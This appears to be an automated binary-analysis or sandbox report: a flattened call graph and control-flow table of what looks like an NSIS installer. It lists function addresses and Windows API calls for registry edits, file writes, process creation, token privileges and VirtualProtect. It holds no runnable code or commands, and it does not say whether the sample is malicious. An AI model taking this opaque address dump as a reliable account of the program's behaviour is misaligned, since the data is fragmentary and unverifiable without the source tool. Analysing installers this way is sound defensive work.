40657a 17 API calls 5394->5395 5396 404de4 lstrlenW wsprintfW SetDlgItemTextW 5395->5396 5396->5385 5397 404609 lstrlenW 5398 404628 5397->5398 5399 40462a WideCharToMultiByte 5397->5399 5398->5399 4224 40248a 4225 402da6 17 API calls 4224->4225 4226 40249c 4225->4226 4227 402da6 17 API calls 4226->4227 4228 4024a6 4227->4228 4241 402e36 4228->4241 4231 402c2a 4232 4024de 4233 4024ea 4232->4233 4236 402d84 17 API calls 4232->4236 4237 402509 RegSetValueExW 4233->4237 4245 4032b4 4233->4245 4234 402da6 17 API calls 4235 4024d4 lstrlenW 4234->4235 4235->4232 4236->4233 4239 40251f RegCloseKey 4237->4239 4239->4231 4242 402e51 4241->4242 4265 4063d8 4242->4265 4246 4032cd 4245->4246 4247 4032fb 4246->4247 4272 4034e5 SetFilePointer 4246->4272 4269 4034cf 4247->4269 4251 403468 4253 4034aa 4251->4253 4258 40346c 4251->4258 4252 403318 GetTickCount 4254 403452 4252->4254 4261 403367 4252->4261 4255 4034cf ReadFile 4253->4255 4254->4237 4255->4254 4256 4034cf ReadFile 4256->4261 4257 4034cf ReadFile 4257->4258 4258->4254 4258->4257 4259 4060df WriteFile 4258->4259 4259->4258 4260 4033bd GetTickCount 4260->4261 4261->4254 4261->4256 4261->4260 4262 4033e2 MulDiv wsprintfW 4261->4262 4264 4060df WriteFile 4261->4264 4263 40559f 24 API calls 4262->4263 4263->4261 4264->4261 4266 4063e7 4265->4266 4267 4063f2 RegCreateKeyExW 4266->4267 4268 4024b6 4266->4268 4267->4268 4268->4231 4268->4232 4268->4234 4270 4060b0 ReadFile 4269->4270 4271 403306 4270->4271 4271->4251 4271->4252 4271->4254 4272->4247 5400 40498a 5401 4049b6 5400->5401 5402 4049c7 5400->5402 5461 405b81 GetDlgItemTextW 5401->5461 5403 4049d3 GetDlgItem 5402->5403 5436 404a32 5402->5436 5408 4049e7 5403->5408 5405 4049c1 5406 4067c4 5 API calls 5405->5406 5406->5402 5407 4049fb SetWindowTextW 5413 404499 18 API calls 5407->5413 5408->5407 5412 405eb7 4 API calls 5408->5412 5409 404cc5 5411 404500 8 API calls 5409->5411 5416 404cd9 5411->5416 5417 4049f1 5412->5417 5418 404a17 5413->5418 5414 40657a 17 API calls 5419 404aa6 SHBrowseForFolderW 5414->5419 5415 404b46 5420 405f14 18 API calls 5415->5420 5417->5407 5425 405e0c 3 API calls 5417->5425 5421 404499 18 API calls 5418->5421 5422 404b16 5419->5422 5423 404abe CoTaskMemFree 5419->5423 5424 404b4c 5420->5424 5426 404a25 5421->5426 5422->5409 5463 405b81 GetDlgItemTextW 5422->5463 5427 405e0c 3 API calls 5423->5427 5464 40653d lstrcpynW 5424->5464 5425->5407 5462 4044ce SendMessageW 5426->5462 5429 404acb 5427->5429 5433 404b02 SetDlgItemTextW 5429->5433 5437 40657a 17 API calls 5429->5437 5431 404b63 5435 40690a 5 API calls 5431->5435 5432 404a2b 5434 40690a 5 API calls 5432->5434 5433->5422 5434->5436 5443 404b6a 5435->5443 5436->5409 5436->5414 5436->5422 5438 404aea lstrcmpiW 5437->5438 5438->5433 5440 404afb lstrcatW 5438->5440 5439 404bab 5465 40653d lstrcpynW 5439->5465 5440->5433 5442 404bb2 5444 405eb7 4 API calls 5442->5444 5443->5439 5448 405e58 2 API calls 5443->5448 5449 404c03 5443->5449 5445 404bb8 GetDiskFreeSpaceW 5444->5445 5447 404bdc MulDiv 5445->5447 5445->5449 5447->5449 5448->5443 5450 404c74 5449->5450 5452 404e0f 20 API calls 5449->5452 5451 404c97 5450->5451 5454 40140b 2 API calls 5450->5454 5466 4044bb KiUserCallbackDispatcher 5451->5466 5453 404c61 5452->5453 5455 404c76 SetDlgItemTextW 5453->5455 5456 404c66 5453->5456 5454->5451 5455->5450 5458 404d46 20 API calls 5456->5458 5458->5450 5459 404cb3 5459->5409 5460 4048e3 SendMessageW 5459->5460 5460->5409 5461->5405 5462->5432 5463->5415 5464->5431 5465->5442 5466->5459 5467 40290b 5468 402da6 17 API calls 5467->5468 5469 402912 FindFirstFileW 5468->5469 5470 402925 5469->5470 5471 40293a 5469->5471 5472 402943 5471->5472 5475 406484 wsprintfW 5471->5475 5476 40653d lstrcpynW 5472->5476 5475->5472 5476->5470 5477 40190c 5478 401943 5477->5478 5479 402da6 17 API calls 5478->5479 5480 401948 5479->5480 5481 405c49 67 API calls 5480->5481 5482 401951 5481->5482 5483 732f10e1 5484 732f1111 5483->5484 5485 732f12b0 GlobalFree 5484->5485 5486 732f1240 GlobalFree 5484->5486 5487 732f11d7 GlobalAlloc 5484->5487 5488 732f12ab 5484->5488 5489 732f135a 2 API calls 5484->5489 5490 732f1312 2 API calls 5484->5490 5491 732f129a GlobalFree 5484->5491 5492 732f1381 lstrcpyW 5484->5492 5493 732f116b GlobalAlloc 5484->5493 5486->5484 5487->5484 5488->5485 5489->5484 5490->5484 5491->5484 5492->5484 5493->5484 5494 40190f 5495 402da6 17 API calls 5494->5495 5496 401916 5495->5496 5497 405b9d MessageBoxIndirectW 5496->5497 5498 40191f 5497->5498 4616 732f2a7f 4617 732f2acf 4616->4617 4618 732f2a8f VirtualProtect 4616->4618 4618->4617 4619 402891 4620 402898 4619->4620 4626 402ba9 4619->4626 4621 402d84 17 API calls 4620->4621 4622 40289f 4621->4622 4623 4028ae SetFilePointer 4622->4623 4624 4028be 4623->4624 4623->4626 4627 406484 wsprintfW 4624->4627 4627->4626 5499 401491 5500 40559f 24 API calls 5499->5500 5501 401498 5500->5501 5502 401f12 5503 402da6 17 API calls 5502->5503 5504 401f18 5503->5504 5505 402da6 17 API calls 5504->5505 5506 401f21 5505->5506 5507 402da6 17 API calls 5506->5507 5508 401f2a 5507->5508 5509 402da6 17 API calls 5508->5509 5510 401f33 5509->5510 5511 401423 24 API calls 5510->5511 5512 401f3a 5511->5512 5519 405b63 ShellExecuteExW 5512->5519 5514 401f82 5515 4069b5 5 API calls 5514->5515 5517 40292e 5514->5517 5516 401f9f CloseHandle 5515->5516 5516->5517 5519->5514 5520 405513 5521 405523 5520->5521 5522 405537 5520->5522 5523 405529 5521->5523 5532 405580 5521->5532 5524 40553f IsWindowVisible 5522->5524 5528 405556 5522->5528 5526 4044e5 SendMessageW 5523->5526 5527 40554c 5524->5527 5524->5532 5525 405585 CallWindowProcW 5529 405533 5525->5529 5526->5529 5530 404e54 5 API calls 5527->5530 5528->5525 5531 404ed4 4 API calls 5528->5531 5530->5528 5531->5532 5532->5525 5533 402f93 5534 402fa5 SetTimer 5533->5534 5536 402fbe 5533->5536 5534->5536 5535 403013 5536->5535 5537 402fd8 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5536->5537 5537->5535 5538 732f1979 5539 732f199c 5538->5539 5540 732f19e3 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5539->5540 5541 732f19d1 GlobalFree 5539->5541 5542 732f1312 2 API calls 5540->5542 5541->5540 5543 732f1b6e GlobalFree GlobalFree 5542->5543 5544 401d17 5545 402d84 17 API calls 5544->5545 5546 401d1d IsWindow 5545->5546 5547 401a20 5546->5547 4832 403f9a 4833 403fb2 4832->4833 4834 404113 4832->4834 4833->4834 4835 403fbe 4833->4835 4836 404164 4834->4836 4837 404124 GetDlgItem GetDlgItem 4834->4837 4839 403fc9 SetWindowPos 4835->4839 4840 403fdc 4835->4840 4838 4041be 4836->4838 4846 401389 2 API calls 4836->4846 4905 404499 4837->4905 4842 4044e5 SendMessageW 4838->4842 4859 40410e 4838->4859 4839->4840 4843 403fe5 ShowWindow 4840->4843 4844 404027 4840->4844 4871 4041d0 4842->4871 4847 404100 4843->4847 4848 404005 GetWindowLongW 4843->4848 4849 404046 4844->4849 4850 40402f DestroyWindow 4844->4850 4845 40414e KiUserCallbackDispatcher 4851 40140b 2 API calls 4845->4851 4852 404196 4846->4852 4914 404500 4847->4914 4848->4847 4854 40401e ShowWindow 4848->4854 4855 40404b SetWindowLongW 4849->4855 4856 40405c 4849->4856 4904 404422 4850->4904 4851->4836 4852->4838 4858 40419a SendMessageW 4852->4858 4854->4844 4855->4859 4856->4847 4857 404068 GetDlgItem 4856->4857 4862 404096 4857->4862 4863 404079 SendMessageW IsWindowEnabled 4857->4863 4858->4859 4860 40140b 2 API calls 4860->4871 4861 404424 DestroyWindow EndDialog 4861->4904 4866 4040a3 4862->4866 4867 4040ea SendMessageW 4862->4867 4868 4040b6 4862->4868 4878 40409b 4862->4878 4863->4859 4863->4862 4864 404453 ShowWindow 4864->4859 4865 40657a 17 API calls 4865->4871 4866->4867 4866->4878 4867->4847 4872 4040d3 4868->4872 4873 4040be 4868->4873 4870 4040d1 4870->4847 4871->4859 4871->4860 4871->4861 4871->4865 4874 404499 18 API calls 4871->4874 4879 404499 18 API calls 4871->4879 4895 404364 DestroyWindow 4871->4895 4875 40140b 2 API calls 4872->4875 4876 40140b 2 API calls 4873->4876 4874->4871 4877 4040da 4875->4877 4876->4878 4877->4847 4877->4878 4911 404472 4878->4911 4880 40424b GetDlgItem 4879->4880 4881 404260 4880->4881 4882 404268 ShowWindow KiUserCallbackDispatcher 4880->4882 4881->4882 4908 4044bb KiUserCallbackDispatcher 4882->4908 4884 404292 EnableWindow 4889 4042a6 4884->4889 4885 4042ab GetSystemMenu EnableMenuItem SendMessageW 4886 4042db SendMessageW 4885->4886 4885->4889 4886->4889 4888 403f7b 18 API calls 4888->4889 4889->4885 4889->4888 4909 4044ce SendMessageW 4889->4909 4910 40653d lstrcpynW 4889->4910 4891 40430a lstrlenW 4892 40657a 17 API calls 4891->4892 4893 404320 SetWindowTextW 4892->4893 4894 401389 2 API calls 4893->4894 4894->4871 4896 40437e CreateDialogParamW 4895->4896 4895->4904 4897 4043b1 4896->4897 4896->4904 4898 404499 18 API calls 4897->4898 4899 4043bc GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4898->4899 4900 401389 2 API calls 4899->4900 4901 404402 4900->4901 4901->4859 4902 40440a ShowWindow 4901->4902 4903 4044e5 SendMessageW 4902->4903 4903->4904 4904->4859 4904->4864 4906 40657a 17 API calls 4905->4906 4907 4044a4 SetDlgItemTextW 4906->4907 4907->4845 4908->4884 4909->4889 4910->4891 4912 404479 4911->4912 4913 40447f SendMessageW 4911->4913 4912->4913 4913->4870 4915 4045c3 4914->4915 4916 404518 GetWindowLongW 4914->4916 4915->4859 4916->4915 4917 40452d 4916->4917 4917->4915 4918 40455a GetSysColor 4917->4918 4919 40455d 4917->4919 4918->4919 4920 404563 SetTextColor 4919->4920 4921 40456d SetBkMode 4919->4921 4920->4921 4922 404585 GetSysColor 4921->4922 4923 40458b 4921->4923 4922->4923 4924 404592 SetBkColor 4923->4924 4925 40459c 4923->4925 4924->4925 4925->4915 4926 4045b6 CreateBrushIndirect 4925->4926 4927 4045af DeleteObject 4925->4927 4926->4915 4927->4926 5548 732f1774 5549 732f17a3 5548->5549 5550 732f1bff 22 API calls 5549->5550 5551 732f17aa 5550->5551 5552 732f17bd 5551->5552 5553 732f17b1 5551->5553 5555 732f17c7 5552->5555 5556 732f17e4 5552->5556 5554 732f1312 2 API calls 5553->5554 5565 732f17bb 5554->5565 5559 732f15dd 3 API calls 5555->5559 5557 732f180e 5556->5557 5558 732f17ea 5556->5558 5561 732f15dd 3 API calls 5557->5561 5560 732f1654 3 API calls 5558->5560 5562 732f17cc 5559->5562 5564 732f17ef 5560->5564 5561->5565 5563 732f1654 3 API calls 5562->5563 5566 732f17d2 5563->5566 5567 732f1312 2 API calls 5564->5567 5568 732f1312 2 API calls 5566->5568 5569 732f17f5 GlobalFree 5567->5569 5570 732f17d8 GlobalFree 5568->5570 5569->5565 5571 732f1809 GlobalFree 5569->5571 5570->5565 5571->5565 5572 401b9b 5573 401ba8 5572->5573 5574 401bec 5572->5574 5575 401c31 5573->5575 5580 401bbf 5573->5580 5576 401bf1 5574->5576 5577 401c16 GlobalAlloc 5574->5577 5578 40657a 17 API calls 5575->5578 5586 40239d 5575->5586 5576->5586 5593 40653d lstrcpynW 5576->5593 5579 40657a 17 API calls 5577->5579 5581 402397 5578->5581 5579->5575 5591 40653d lstrcpynW 5580->5591 5581->5586 5587 405b9d MessageBoxIndirectW 5581->5587 5584 401c03 GlobalFree 5584->5586 5585 401bce 5592 40653d lstrcpynW 5585->5592 5587->5586 5589 401bdd 5594 40653d lstrcpynW 5589->5594 5591->5585 5592->5589 5593->5584 5594->5586 5595 40261c 5596 402da6 17 API calls 5595->5596 5597 402623 5596->5597 5600 40602d GetFileAttributesW CreateFileW 5597->5600 5599 40262f 5600->5599 4992 40259e 4993 402de6 17 API calls 4992->4993 4994 4025a8 4993->4994 4995 402d84 17 API calls 4994->4995 4996 4025b1 4995->4996 4997 4025d9 RegEnumValueW 4996->4997 4998 4025cd RegEnumKeyW 4996->4998 4999 40292e 4996->4999 5000 4025ee RegCloseKey 4997->5000 4998->5000 5000->4999 5601 40149e 5602 4014ac PostQuitMessage 5601->5602 5603 40239d 5601->5603 5602->5603 4192 4015a3 4193 402da6 17 API calls 4192->4193 4194 4015aa SetFileAttributesW 4193->4194 4195 4015bc 4194->4195 4196 401fa4 4197 402da6 17 API calls 4196->4197 4198 401faa 4197->4198 4199 40559f 24 API calls 4198->4199 4200 401fb4 4199->4200 4211 405b20 CreateProcessW 4200->4211 4205 401fcf 4207 401fd4 4205->4207 4208 401fdf 4205->4208 4206 40292e 4219 406484 wsprintfW 4207->4219 4210 401fdd CloseHandle 4208->4210 4210->4206 4212 405b53 CloseHandle 4211->4212 4213 401fba 4211->4213 4212->4213 4213->4206 4213->4210 4214 4069b5 WaitForSingleObject 4213->4214 4215 4069cf 4214->4215 4216 4069e1 GetExitCodeProcess 4215->4216 4220 406946 4215->4220 4216->4205 4219->4210 4221 406963 PeekMessageW 4220->4221 4222 406973 WaitForSingleObject 4221->4222 4223 406959 DispatchMessageW 4221->4223 4222->4215 4223->4221 4273 40252a 4284 402de6 4273->4284 4276 402da6 17 API calls 4277 40253d 4276->4277 4278 402548 RegQueryValueExW 4277->4278 4280 40292e 4277->4280 4279 402568 4278->4279 4281 40256e RegCloseKey 4278->4281 4279->4281 4289 406484 wsprintfW 4279->4289 4281->4280 4285 402da6 17 API calls 4284->4285 4286 402dfd 4285->4286 4287 4063aa RegOpenKeyExW 4286->4287 4288 402534 4287->4288 4288->4276 4289->4281 5604 40202a 5605 402da6 17 API calls 5604->5605 5606 402031 5605->5606 5607 40690a 5 API calls 5606->5607 5608 402040 5607->5608 5609 40205c GlobalAlloc 5608->5609 5614 4020cc 5608->5614 5610 402070 5609->5610 5609->5614 5611 40690a 5 API calls 5610->5611 5612 402077 5611->5612 5613 40690a 5 API calls 5612->5613 5615 402081 5613->5615 5615->5614 5619 406484 wsprintfW 5615->5619 5617 4020ba 5620 406484 wsprintfW 5617->5620 5619->5617 5620->5614 5621 4021aa 5622 402da6 17 API calls 5621->5622 5623 4021b1 5622->5623 5624 402da6 17 API calls 5623->5624 5625 4021bb 5624->5625 5626 402da6 17 API calls 5625->5626 5627 4021c5 5626->5627 5628 402da6 17 API calls 5627->5628 5629 4021cf 5628->5629 5630 402da6 17 API calls 5629->5630 5631 4021d9 5630->5631 5632 402218 CoCreateInstance 5631->5632 5633 402da6 17 API calls 5631->5633 5636 402237 5632->5636 5633->5632 5634 401423 24 API calls 5635 4022f6 5634->5635 5636->5634 5636->5635 5637 403baa 5638 403bb5 5637->5638 5639 403bbc GlobalAlloc 5638->5639 5640 403bb9 5638->5640 5639->5640 5641 732f2d43 5642 732f2d5b 5641->5642 5643 732f162f 2 API calls 5642->5643 5644 732f2d76 5643->5644 4317 40352d SetErrorMode GetVersionExW 4318 4035b7 4317->4318 4319 40357f GetVersionExW 4317->4319 4320 403610 4318->4320 4321 40690a 5 API calls 4318->4321 4319->4318 4322 40689a 3 API calls 4320->4322 4321->4320 4323 403626 lstrlenA 4322->4323 4323->4320 4324 403636 4323->4324 4325 40690a 5 API calls 4324->4325 4326 40363d 4325->4326 4327 40690a 5 API calls 4326->4327 4328 403644 4327->4328 4329 40690a 5 API calls 4328->4329 4330 403650 #17 OleInitialize SHGetFileInfoW 4329->4330 4408 40653d lstrcpynW 4330->4408 4333 40369d GetCommandLineW 4409 40653d lstrcpynW 4333->4409 4335 4036af 4336 405e39 CharNextW 4335->4336 4337 4036d5 CharNextW 4336->4337 4345 4036e6 4337->4345 4338 4037e4 4339 4037f8 GetTempPathW 4338->4339 4410 4034fc 4339->4410 4341 403810 4342 403814 GetWindowsDirectoryW lstrcatW 4341->4342 4343 40386a DeleteFileW 4341->4343 4346 4034fc 12 API calls 4342->4346 4420 40307d GetTickCount GetModuleFileNameW 4343->4420 4344 405e39 CharNextW 4344->4345 4345->4338 4345->4344 4351 4037e6 4345->4351 4348 403830 4346->4348 4348->4343 4350 403834 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4348->4350 4349 40387d 4352 403941 4349->4352 4356 403932 4349->4356 4357 405e39 CharNextW 4349->4357 4355 4034fc 12 API calls 4350->4355 4504 40653d lstrcpynW 4351->4504 4509 403b12 4352->4509 4360 403862 4355->4360 4448 403bec 4356->4448 4372 40389f 4357->4372 4360->4343 4360->4352 4361 403a69 4516 405b9d 4361->4516 4362 403a7e 4364 403a86 GetCurrentProcess OpenProcessToken 4362->4364 4365 403afc ExitProcess 4362->4365 4370 403acc 4364->4370 4371 403a9d LookupPrivilegeValueW AdjustTokenPrivileges 4364->4371 4367 403908 4374 405f14 18 API calls 4367->4374 4368 403949 4373 405b08 5 API calls 4368->4373 4375 40690a 5 API calls 4370->4375 4371->4370 4372->4367 4372->4368 4376 40394e lstrcatW 4373->4376 4377 403914 4374->4377 4378 403ad3 4375->4378 4380 40396a lstrcatW lstrcmpiW 4376->4380 4381 40395f lstrcatW 4376->4381 4377->4352 4505 40653d lstrcpynW 4377->4505 4379 403ae8 ExitWindowsEx 4378->4379 4382 403af5 4378->4382 4379->4365 4379->4382 4380->4352 4383 40398a 4380->4383 4381->4380 4520 40140b 4382->4520 4386 403996 4383->4386 4387 40398f 4383->4387 4390 405aeb 2 API calls 4386->4390 4389 405a6e 4 API calls 4387->4389 4388 403927 4506 40653d lstrcpynW 4388->4506 4392 403994 4389->4392 4393 40399b SetCurrentDirectoryW 4390->4393 4392->4393 4394 4039b8 4393->4394 4395 4039ad 4393->4395 4508 40653d lstrcpynW 4394->4508 4507 40653d lstrcpynW 4395->4507 4398 40657a 17 API calls 4399 4039fa DeleteFileW 4398->4399 4400 403a06 CopyFileW 4399->4400 4405 4039c5 4399->4405 4400->4405 4401 403a50 4402 4062fd 36 API calls 4401->4402 4402->4352 4403 4062fd 36 API calls 4403->4405 4404 40657a 17 API calls 4404->4405 4405->4398 4405->4401 4405->4403 4405->4404 4406 405b20 2 API calls 4405->4406 4407 403a3a CloseHandle 4405->4407 4406->4405 4407->4405 4408->4333 4409->4335 4411 4067c4 5 API calls 4410->4411 4413 403508 4411->4413 4412 403512 4412->4341 4413->4412 4414 405e0c 3 API calls 4413->4414 4415 40351a 4414->4415 4416 405aeb 2 API calls 4415->4416 4417 403520 4416->4417 4523 40605c 4417->4523 4527 40602d GetFileAttributesW CreateFileW 4420->4527 4422 4030bd 4442 4030cd 4422->4442 4528 40653d lstrcpynW 4422->4528 4424 4030e3 4425 405e58 2 API calls 4424->4425 4426 4030e9 4425->4426 4529 40653d lstrcpynW 4426->4529 4428 4030f4 GetFileSize 4429 4031ee 4428->4429 4447 40310b 4428->4447 4530 403019 4429->4530 4431 4031f7 4433 403227 GlobalAlloc 4431->4433 4431->4442 4542 4034e5 SetFilePointer 4431->4542 4432 4034cf ReadFile 4432->4447 4541 4034e5 SetFilePointer 4433->4541 4435 40325a 4439 403019 6 API calls 4435->4439 4437 403210 4440 4034cf ReadFile 4437->4440 4438 403242 4441 4032b4 31 API calls 4438->4441 4439->4442 4443 40321b 4440->4443 4445 40324e 4441->4445 4442->4349 4443->4433 4443->4442 4444 403019 6 API calls 4444->4447 4445->4442 4445->4445 4446 40328b SetFilePointer 4445->4446 4446->4442 4447->4429 4447->4432 4447->4435 4447->4442 4447->4444 4449 40690a 5 API calls 4448->4449 4450 403c00 4449->4450 4451 403c06 4450->4451 4452 403c18 4450->4452 4558 406484 wsprintfW 4451->4558 4453 40640b 3 API calls 4452->4453 4454 403c48 4453->4454 4455 403c67 lstrcatW 4454->4455 4457 40640b 3 API calls 4454->4457 4458 403c16 4455->4458 4457->4455 4543 403ec2 4458->4543 4461 405f14 18 API calls 4462 403c99 4461->4462 4463 403d2d 4462->4463 4465 40640b 3 API calls 4462->4465 4464 405f14 18 API calls 4463->4464 4466 403d33 4464->4466 4467 403ccb 4465->4467 4468 403d43 LoadImageW 4466->4468 4471 40657a 17 API calls 4466->4471 4467->4463 4474 403cec lstrlenW 4467->4474 4477 405e39 CharNextW 4467->4477 4469 403de9 4468->4469 4470 403d6a RegisterClassW 4468->4470 4473 40140b 2 API calls 4469->4473 4472 403da0 SystemParametersInfoW CreateWindowExW 4470->4472 4503 403df3 4470->4503 4471->4468 4472->4469 4480 403def 4473->4480 4475 403d20 4474->4475 4476 403cfa lstrcmpiW 4474->4476 4481 405e0c 3 API calls 4475->4481 4476->4475 4479 403d0a GetFileAttributesW 4476->4479 4478 403ce9 4477->4478 4478->4474 4482 403d16 4479->4482 4483 403ec2 18 API calls 4480->4483 4480->4503 4484 403d26 4481->4484 4482->4475 4485 405e58 2 API calls 4482->4485 4486 403e00 4483->4486 4559 40653d lstrcpynW 4484->4559 4485->4475 4488 403e0c ShowWindow 4486->4488 4489 403e8f 4486->4489 4491 40689a 3 API calls 4488->4491 4551 405672 OleInitialize 4489->4551 4493 403e24 4491->4493 4492 403e95 4494 403eb1 4492->4494 4495 403e99 4492->4495 4496 403e32 GetClassInfoW 4493->4496 4500 40689a 3 API calls 4493->4500 4499 40140b 2 API calls 4494->4499 4502 40140b 2 API calls 4495->4502 4495->4503 4497 403e46 GetClassInfoW RegisterClassW 4496->4497 4498 403e5c DialogBoxParamW 4496->4498 4497->4498 4501 40140b 2 API calls 4498->4501 4499->4503 4500->4496 4501->4503 4502->4503 4503->4352 4504->4339 4505->4388 4506->4356 4507->4394 4508->4405 4510 403b2a 4509->4510 4511 403b1c CloseHandle 4509->4511 4571 403b57 4510->4571 4511->4510 4514 405c49 67 API calls 4515 403a5e OleUninitialize 4514->4515 4515->4361 4515->4362 4517 405bb2 4516->4517 4518 403a76 ExitProcess 4517->4518 4519 405bc6 MessageBoxIndirectW 4517->4519 4519->4518 4521 401389 2 API calls 4520->4521 4522 401420 4521->4522 4522->4365 4524 406069 GetTickCount GetTempFileNameW 4523->4524 4525 40352b 4524->4525 4526 40609f 4524->4526 4525->4341 4526->4524 4526->4525 4527->4422 4528->4424 4529->4428 4531 403022 4530->4531 4532 40303a 4530->4532 4533 403032 4531->4533 4534 40302b DestroyWindow 4531->4534 4535 403042 4532->4535 4536 40304a GetTickCount 4532->4536 4533->4431 4534->4533 4539 406946 2 API calls 4535->4539 4537 403058 CreateDialogParamW ShowWindow 4536->4537 4538 40307b 4536->4538 4537->4538 4538->4431 4540 403048 4539->4540 4540->4431 4541->4438 4542->4437 4544 403ed6 4543->4544 4560 406484 wsprintfW 4544->4560 4546 403f47 4561 403f7b 4546->4561 4548 403c77 4548->4461 4549 403f4c 4549->4548 4550 40657a 17 API calls 4549->4550 4550->4549 4564 4044e5 4551->4564 4553 4056bc 4554 4044e5 SendMessageW 4553->4554 4555 4056ce OleUninitialize 4554->4555 4555->4492 4556 405695 4556->4553 4567 401389 4556->4567 4558->4458 4559->4463 4560->4546 4562 40657a 17 API calls 4561->4562 4563 403f89 SetWindowTextW 4562->4563 4563->4549 4565 4044fd 4564->4565 4566 4044ee SendMessageW 4564->4566 4565->4556 4566->4565 4569 401390 4567->4569 4568 4013fe 4568->4556 4569->4568 4570 4013cb MulDiv SendMessageW 4569->4570 4570->4569 4572 403b65 4571->4572 4573 403b2f 4572->4573 4574 403b6a FreeLibrary GlobalFree 4572->4574 4573->4514 4574->4573 4574->4574 5645 401a30 5646 402da6 17 API calls 5645->5646 5647 401a39 ExpandEnvironmentStringsW 5646->5647 5648 401a4d 5647->5648 5650 401a60 5647->5650 5649 401a52 lstrcmpW 5648->5649 5648->5650 5649->5650 4628 4023b2 4629 4023c0 4628->4629 4630 4023ba 4628->4630 4632 402da6 17 API calls 4629->4632 4633 4023ce 4629->4633 4631 402da6 17 API calls 4630->4631 4631->4629 4632->4633 4634 402da6 17 API calls 4633->4634 4636 4023dc 4633->4636 4634->4636 4635 402da6 17 API calls 4637 4023e5 WritePrivateProfileStringW 4635->4637 4636->4635 5656 402434 5657 402467 5656->5657 5658 40243c 5656->5658 5660 402da6 17 API calls 5657->5660 5659 402de6 17 API calls 5658->5659 5661 402443 5659->5661 5662 40246e 5660->5662 5664 402da6 17 API calls 5661->5664 5666 40247b 5661->5666 5667 402e64 5662->5667 5665 402454 RegDeleteValueW RegCloseKey 5664->5665 5665->5666 5668 402e78 5667->5668 5669 402e71 5667->5669 5668->5669 5671 402ea9 5668->5671 5669->5666 5672 4063aa RegOpenKeyExW 5671->5672 5673 402ed7 5672->5673 5674 402ee7 RegEnumValueW 5673->5674 5681 402f81 5673->5681 5683 402f0a 5673->5683 5675 402f71 RegCloseKey 5674->5675 5674->5683 5675->5681 5676 402f46 RegEnumKeyW 5677 402f4f RegCloseKey 5676->5677 5676->5683 5678 40690a 5 API calls 5677->5678 5679 402f5f 5678->5679 5679->5681 5682 402f63 RegDeleteKeyW 5679->5682 5680 402ea9 6 API calls 5680->5683 5681->5669 5682->5681 5683->5675 5683->5676 5683->5677 5683->5680 5684 401735 5685 402da6 17 API calls 5684->5685 5686 40173c SearchPathW 5685->5686 5687 401757 5686->5687 5688 732f1058 5690 732f1074 5688->5690 5689 732f10dd 5690->5689 5691 732f15b6 GlobalFree 5690->5691 5692 732f1092 5690->5692 5691->5692 5693 732f15b6 GlobalFree 5692->5693 5694 732f10a2 5693->5694 5695 732f10a9 GlobalSize 5694->5695 5696 732f10b2 5694->5696 5695->5696 5697 732f10c7 5696->5697 5698 732f10b6 GlobalAlloc 5696->5698 5700 732f10d2 GlobalFree 5697->5700 5699 732f15dd 3 API calls 5698->5699 5699->5697 5700->5689 5701 4014b8 5702 4014be 5701->5702 5703 401389 2 API calls 5702->5703 5704 4014c6 5703->5704 5705 401d38 5706 402d84 17 API calls 5705->5706 5707 401d3f 5706->5707 5708 402d84 17 API calls 5707->5708 5709 401d4b GetDlgItem 5708->5709 5710 402638 5709->5710 5711 40263e 5712 402652 5711->5712 5713 40266d 5711->5713 5714 402d84 17 API calls 5712->5714 5715 402672 5713->5715 5716 40269d 5713->5716 5724 402659 5714->5724 5717 402da6 17 API calls 5715->5717 5718 402da6 17 API calls 5716->5718 5719 402679 5717->5719 5720 4026a4 lstrlenW 5718->5720 5728 40655f WideCharToMultiByte 5719->5728 5720->5724 5722 40268d lstrlenA 5722->5724 5723 4026e7 5724->5723 5726 40610e 5 API calls 5724->5726 5727 4026d1 5724->5727 5725 4060df WriteFile 5725->5723 5726->5727 5727->5723 5727->5725 5728->5722

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 40352d-40357d SetErrorMode GetVersionExW 1 4035b7-4035be 0->1 2 40357f-4035b3 GetVersionExW 0->2 3 4035c0 1->3 4 4035c8-403608 1->4 2->1 3->4 5 40360a-403612 call 40690a 4->5 6 40361b 4->6 5->6 12 403614 5->12 7 403620-403634 call 40689a lstrlenA 6->7 13 403636-403652 call 40690a * 3 7->13 12->6 20 403663-4036c5 #17 OleInitialize SHGetFileInfoW call 40653d GetCommandLineW call 40653d 13->20 21 403654-40365a 13->21 28 4036c7-4036c9 20->28 29 4036ce-4036e1 call 405e39 CharNextW 20->29 21->20 26 40365c 21->26 26->20 28->29 32 4037d8-4037de 29->32 33 4037e4 32->33 34 4036e6-4036ec 32->34 35 4037f8-403812 GetTempPathW call 4034fc 33->35 36 4036f5-4036fb 34->36 37 4036ee-4036f3 34->37 44 403814-403832 GetWindowsDirectoryW lstrcatW call 4034fc 35->44 45 40386a-403882 DeleteFileW call 40307d 35->45 39 403702-403706 36->39 40 4036fd-403701 36->40 37->36 37->37 42 4037c6-4037d4 call 405e39 39->42 43 40370c-403712 39->43 40->39 42->32 61 4037d6-4037d7 42->61 47 403714-40371b 43->47 48 40372c-403765 43->48 44->45 64 403834-403864 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4034fc 44->64 66 403888-40388e 45->66 67 403a59-403a67 call 403b12 OleUninitialize 45->67 49 403722 47->49 50 40371d-403720 47->50 51 403781-4037bb 48->51 52 403767-40376c 48->52 49->48 50->48 50->49 58 4037c3-4037c5 51->58 59 4037bd-4037c1 51->59 52->51 56 40376e-403776 52->56 62 403778-40377b 56->62 63 40377d 56->63 58->42 59->58 65 4037e6-4037f3 call 40653d 59->65 61->32 62->51 62->63 63->51 64->45 64->67 65->35 71 403894-4038a7 call 405e39 66->71 72 403935-40393c call 403bec 66->72 79 403a69-403a78 call 405b9d ExitProcess 67->79 80 403a7e-403a84 67->80 81 4038f9-403906 71->81 82 4038a9-4038de 71->82 78 403941-403944 72->78 78->67 84 403a86-403a9b GetCurrentProcess OpenProcessToken 80->84 85 403afc-403b04 80->85 89 403908-403916 call 405f14 81->89 90 403949-40395d call 405b08 lstrcatW 81->90 86 4038e0-4038e4 82->86 92 403acc-403ada call 40690a 84->92 93 403a9d-403ac6 LookupPrivilegeValueW AdjustTokenPrivileges 84->93 87 403b06 85->87 88 403b09-403b0c ExitProcess 85->88 94 4038e6-4038eb 86->94 95 4038ed-4038f5 86->95 87->88 89->67 107 